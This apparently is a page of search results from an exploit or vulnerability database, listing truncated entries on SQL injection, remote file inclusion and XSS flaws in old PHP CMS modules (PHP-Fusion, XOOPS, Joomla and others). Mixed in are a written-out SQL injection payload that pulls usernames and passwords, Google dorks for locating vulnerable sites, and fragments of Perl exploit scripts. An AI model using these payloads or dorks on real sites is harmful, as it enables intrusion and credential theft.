7210 matches found
PHP-FUSION Arcade Module (cid) Remote SQL Injection Vuln
-------------------------------- PHP-FUSION Arcade Module cid Remote SQL Injection Vuln -------------------------------- Found by: xoron xoron.biz -------------------------------- Exploit: index.php?op=viewgamelist&cid=-1//union//select//null,username,userpassword,null,null,null//from//fusionusers/...
Remote File Include In Script stat12
By Hasadya Raed Contact : [email protected] Israel --------------------------- Script : stat12 Download Script : http://www.samphp.com Dork : Copyright c 2004 by Sam Tang Greetz : Yonatan --------------------------- B.File : index.php --------------------------- Expl :...
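Malaika System MyAds Xoops Module Index.php SQL Injection Vulnerability
Malaika System MyAds is a PHP-based web application. Malaika System MyAds does not properly filter user-supplied input; remote attackers can exploit the vulnerability to carry out SQL injection attacks and obtain sensitive information. The problem is that the 'Index.PHP' script does not filter the user-supplied 'cid' parameter; submitting malicious SQL code as the parameter data can alter the original SQL logic and expose sensitive information. Malaika System MyAds 2.04jp No solution is currently available: http://malaika.s31.xrea.com/ !/usr/bin/perl Script Name: Xoops Module MyAds Bug Fix ...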
2BGal 3.1.1 <= (admin/index.php) Remote File Include Vulnerability
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+= 2BGal 3.1.1 = admin/index.php Remote File Include Vulnerability Script: 2BGal Version: 3.1.1 Download: http://www.ben3w.com/multimedia/2bgal.zip Discover: BorN To K!LL =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+= Bug in:...
CVE-2007-1811
The vulnerability described as CVE-2007-1811 affects the Tiny Event module for XOOPS (version 1.01 and earlier). It is a SQL injection in index.php where the id parameter used by the show action allows remote attackers to execute arbitrary SQL commands. This is the confirmed root cause: improper ...
slaed-rfi.txt
By Hasadya Raed Contact : [email protected] Israel ----------------------------------------------- Script : SLAEDCMS2 Dork : "Web site engine code is Copyright © 2006 by SLAED CMS. All rights reserved" ----------------------------------------------- B.Files : admin.php index.php...
PHP-Fusion Module topliste 1.0 - cid SQL Injection
PHP-Fusion Module topliste 1.0 - cid SQL Injection -------------------------------- PHP-FUSION topliste Module cid Remote SQL Injection Vuln -------------------------------- Found by: xoron - unique xoron.biz -------------------------------- Exploit:...
Xoops Module Lykos Reviews 1.00 (index.php) SQL Injection Exploit
No description provided by source. html head titleXOOPS Module Lykos Reviews 1.00 index.php BLIND SQL Injection Exploit/title script type="text/javascript" //'=============================================================================================== //'Script Name: XOOPS Module Lykos Reviews...
Remot File Include In SLAED_CMS_2
By Hasadya Raed Contact : [email protected] Israel ----------------------------------------------- Script : SLAEDCMS2 Dork : "Web site engine code is Copyright © 2006 by SLAED CMS. All rights reserved" ----------------------------------------------- B.Files : admin.php index.php...
XOOPS Module Lykos Reviews 1.00 - index.php SQL Injection
XOOPS Module Lykos Reviews 1.00 - index.php SQL Injection XOOPS Module Lykos Reviews 1.00 index.php BLIND SQL Injection Exploit //'=============================================================================================== //'Script Name: XOOPS Module Lykos Reviews 1.00 index.php BLIND SQL...
CVE-2007-1776
The vulnerability CVE-2007-1776 affects the DesignForJoomla.com D4J eZine (com_ezine) Joomla! extension (version 2.8 and earlier). The root cause is an SQL injection in index.php that allows remote attackers to execute arbitrary SQL commands via the article parameter in a read action. The connect...
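Joomla! D4JeZine Component index.php SQL Injection Vulnerability
Joomla! D4JeZine is a PHP-based web application. Joomla! D4JeZine does not properly filter user-supplied input; remote attackers can exploit the vulnerability to carry out SQL injection attacks and obtain sensitive information. The problem is that the 'Index.PHP' script does not filter user-supplied web parameters; submitting malicious SQL code as the parameter data can alter the original SQL logic and expose sensitive information. DesignForJoomla D4J eZine 2.8 No solution is currently available: http://designforjoomla.com/joomlaextensions/d4jezine.php html head titleJoomla Component...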
XOOPS Module MyAds Bug Fix 2.04jp - index.php SQL Injection
XOOPS Module MyAds Bug Fix 2.04jp - index.php SQL Injection !/usr/bin/perl Script Name: Xoops Module MyAds Bug Fix : "; $dir = ; chop $dir; if $dir = /exit/ print "-- Exploit FailedYou Are Exited \n"; exit; if $dir = /// else print "-- Exploit FailedNo DIR \n"; exit; $target =...
XOOPS Module MyAds Bug Fix 2.04jp - 'index.php' SQL Injection
!/usr/bin/perl Script Name: Xoops Module MyAds Bug Fix : "; $dir = ; chop $dir; if $dir = /exit/ print "-- Exploit FailedYou Are Exited \n"; exit; if $dir = /// else print "-- Exploit FailedNo DIR \n"; exit; $target =...
CVE-2007-1729
SQL injection vulnerability in includes/start.php in Flexbb 1.0.0 10005 Beta Release 1 allows remote attackers to execute arbitrary SQL commands via the flexbblangid COOKIE parameter to index.php...
Cross site scripting
Cross-site scripting XSS vulnerability in index.php in CcCounter 2.0 allows remote attackers to inject arbitrary web script or HTML via dir parameter...
CVE-2007-1714
CcCounter 2.0 contains a cross-site scripting (XSS) vulnerability in index.php through the dir parameter. The issue arises from insufficient input handling of dir, enabling remote attackers to inject arbitrary scripts/HTML that may be executed in a user’s browser. Impact is partial confidentialit...
ccc20-xss.txt
--------------------------------------- Title : CcCounter 2.0 cross-site scripting vulnerability Found By : CrackersChild Contact : localexploitdothotmaildotcom Dork : CcCounter 2.0 Statistics Exploit :...
Net-Side.net CMS (index.php cms) Remote File Inclusion Vulnerability
No description provided by source. I see your future and your future is death. Sharingan ! -------------------------------------------------------------------------------------------------------------- Hi I'm sharingan and this is my vuln : script name : Net Side Content Management System 2...
Joomla Component Car Manager <= 1.1 Remote SQL Injection Exploit
No description provided by source. !/usr/bin/perl Script Name: Joomla Component Car Manager = 1.1 Blind SQL Injection Exploit Coded by : ajann Author : ajann Dork : "index.php?option=comresman" Contact : : S.Page : http://www.webformatique.net $$ : .39.99 .. : ajann,Turkey use IO::Socket; if@ARGV...